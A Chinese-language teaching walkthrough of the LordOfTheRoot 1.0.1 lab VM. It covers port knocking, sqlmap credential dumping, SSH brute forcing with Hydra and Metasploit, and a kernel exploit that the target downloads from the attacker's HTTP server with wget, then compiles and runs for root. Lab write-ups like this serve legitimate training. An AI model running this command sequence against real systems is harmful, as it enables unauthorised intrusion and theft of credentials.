LordOfTheRoot 1.0.1 渗透测试教学文档<\/h1>

1. 环境准备<\/h2>

攻击机<\/strong>: Kali Linux<\/li>
目标机<\/strong>: LordOfTheRoot 1.0.1 (IP: 192.168.111.138)<\/li>

工具<\/strong>: VMware, nmap, knock\/hping3, dirb, sqlmap, hydra, Metasploit, gcc<\/li> <\/ul>
2. 信息收集<\/h2>
2.1 网络扫描<\/h3>
使用nmap进行主机发现和端口扫描：<\/p>
nmap -sP 192.168.111.0\/24 # 发现目标IP<\/span> <\/span><\/span>nmap -sS -sV -A -p- -T5 192.168.111.138 # 详细扫描<\/span> <\/span><\/span><\/code><\/pre>初始扫描结果仅显示22端口(SSH服务)开放。<\/p> 3. 端口碰撞(Port Knocking)<\/h2> 目标提示"Easy as 1,2,3"，暗示需要进行端口碰撞。<\/p> 3.1 端口碰撞方法<\/h3> 方法一：使用knock工具<\/h4> sudo apt install knockd <\/span><\/span>knock <IP> 1<\/span> 2<\/span> 3<\/span> -v <\/span><\/span><\/code><\/pre>方法二：使用hping3<\/h4> hping3 -S 192.168.111.138 -p 1<\/span> -c 1<\/span> <\/span><\/span>hping3 -S 192.168.111.138 -p 2<\/span> -c 1<\/span> <\/span><\/span>hping3 -S 192.168.111.138 -p 3<\/span> -c 1<\/span> <\/span><\/span><\/code><\/pre>参数说明：<\/p> -S<\/code>: 发送SYN包(TCP连接握手信号)<\/li> -p<\/code>: 目标端口<\/li> -c<\/code>: 发送次数<\/li> <\/ul> 3.2 验证碰撞结果<\/h3> 再次扫描确认新开放的端口：<\/p> nmap -sS -sV -A -p- -T5 192.168.111.138 <\/span><\/span><\/code><\/pre>发现1337端口(HTTP服务)已开放。<\/p> 4. Web渗透<\/h2> 4.1 目录枚举<\/h3> 访问发现的路径：<\/p> http:\/\/192.168.111.138:1337\/usr\/share\/dirb\/wordlists\/common.txt <\/code><\/pre> 在页面源代码中发现Base64编码信息：<\/p> THprM09ETTBOVEl4TUM5cGJtUmxlQzV3YUhBPSBDbG9zZXIh <\/code><\/pre> 4.2 Base64解码<\/h3> echo 'THprM09ETTBOVEl4TUM5cGJtUmxlQzV3YUhBPSBDbG9zZXIh'<\/span> | base64 -d <\/span><\/span><\/code><\/pre>得到：<\/p> Lzk3ODM0NTIxMC9pbmRleC5waHA= , Closer! <\/code><\/pre> 继续解码：<\/p> echo 'Lzk3ODM0NTIxMC9pbmRleC5waHA=' | base64 -d <\/code><\/pre> 得到路径：<\/p> \/978345210\/index.php <\/code><\/pre> 4.3 SQL注入<\/h3> 访问发现的页面：<\/p> http:\/\/192.168.111.138:1337\/\/978345210\/index.php <\/code><\/pre> 使用sqlmap进行注入：<\/p> 爆破数据库名：<\/h4> sqlmap -u http:\/\/192.168.111.138:1337\/\/978345210\/index.php --forms --dbs -o <\/span><\/span><\/code><\/pre>发现数据库：<\/p> information_schema<\/li> mysql<\/li> performance_schema<\/li> Webapp<\/li> <\/ul> 爆破表名：<\/h4> sqlmap -u http:\/\/192.168.111.138:1337\/\/978345210\/index.php --forms -D Webapp --tables <\/span><\/span><\/code><\/pre>发现Users表。<\/p> 爆破字段：<\/h4> sqlmap -u http:\/\/192.168.111.138:1337\/\/978345210\/index.php --forms -D Webapp -T Users --columns <\/span><\/span><\/code><\/pre>发现字段：id, username, password。<\/p> 爆破数据：<\/h4> sqlmap -o -u "http:\/\/192.168.111.138:1337\/978345210\/index.php"<\/span> --forms -D Webapp -T Users -C id,username,password --dump <\/span><\/span><\/code><\/pre>获得凭证：<\/p> 用户: frodo, smeagol, aragorn, legolas, gimli 密码: iwilltakethering, MyPreciousR00t, AndMySword, AndMyBow, AndMyAxe <\/code><\/pre> 5. SSH爆破<\/h2> 5.1 使用Hydra爆破<\/h3> hydra -L user.txt -P pass.txt 192.168.111.138 ssh <\/span><\/span><\/code><\/pre>成功凭证：<\/p> smeagol:MyPreciousR00t <\/code><\/pre> 5.2 使用Metasploit爆破<\/h3> msfconsole <\/span><\/span>use auxiliary\/scanner\/ssh\/ssh_login <\/span><\/span>set rhost 192.168.111.138 <\/span><\/span>set user_file \/root\/Desktop\/lordof\/user.txt <\/span><\/span>set pass_file \/root\/Desktop\/lordof\/pass.txt <\/span><\/span>set stop_on_success true <\/span><\/span>run <\/span><\/span><\/code><\/pre>6. 提权<\/h2> 6.1 登录SSH<\/h3> ssh smeagol@192.168.111.138 <\/span><\/span>密码: MyPreciousR00t <\/span><\/span><\/code><\/pre>检查系统信息：<\/p> id <\/span><\/span>lsb_release -a # Ubuntu 14.04.3 LTS<\/span> <\/span><\/span><\/code><\/pre>6.2 内核提权<\/h3> 查找漏洞：<\/h4> 搜索Ubuntu 14.04 exploit，发现EDB-ID:39166。<\/p> 获取并编译EXP：<\/h4> searchsploit 39166<\/span> <\/span><\/span>locate linux\/local\/39166.c <\/span><\/span>cp \/usr\/share\/exploitdb\/exploits\/linux\/local\/39166.c . <\/span><\/span><\/code><\/pre>传输EXP到目标：<\/h4> 在Kali开启HTTP服务：<\/p> python -m SimpleHTTPServer 8081<\/span> <\/span><\/span><\/code><\/pre>在目标机下载：<\/p> wget http:\/\/192.168.111.128:8081\/39166.c <\/span><\/span>gcc 39166.c -o yg <\/span><\/span>chmod +x yg <\/span><\/span>.\/yg <\/span><\/span><\/code><\/pre>成功获得root权限。<\/p> 查看flag：<\/h4> "There is only one Lord of the Ring, only one who can bend it to his will. And he does not share power." - Gandalf <\/code><\/pre> 6.3 备选提权方法：MySQL UDF提权<\/h3> （文档中未详细展开，可作为扩展研究）<\/p> 7. 总结<\/h2> 本次渗透测试流程：<\/p> 信息收集发现SSH服务<\/li> 通过端口碰撞打开HTTP服务<\/li> Web目录枚举发现隐藏路径<\/li> Base64解码发现真实路径<\/li> SQL注入获取数据库凭证<\/li> SSH爆破获得系统访问权<\/li> 内核漏洞利用实现提权<\/li> <\/ol> 关键点：<\/p> 端口碰撞技术的理解和应用<\/li> Web信息收集和编码分析<\/li> SQL注入自动化工具使用<\/li> 凭证爆破技巧<\/li> 内核漏洞利用方法<\/li> <\/ul>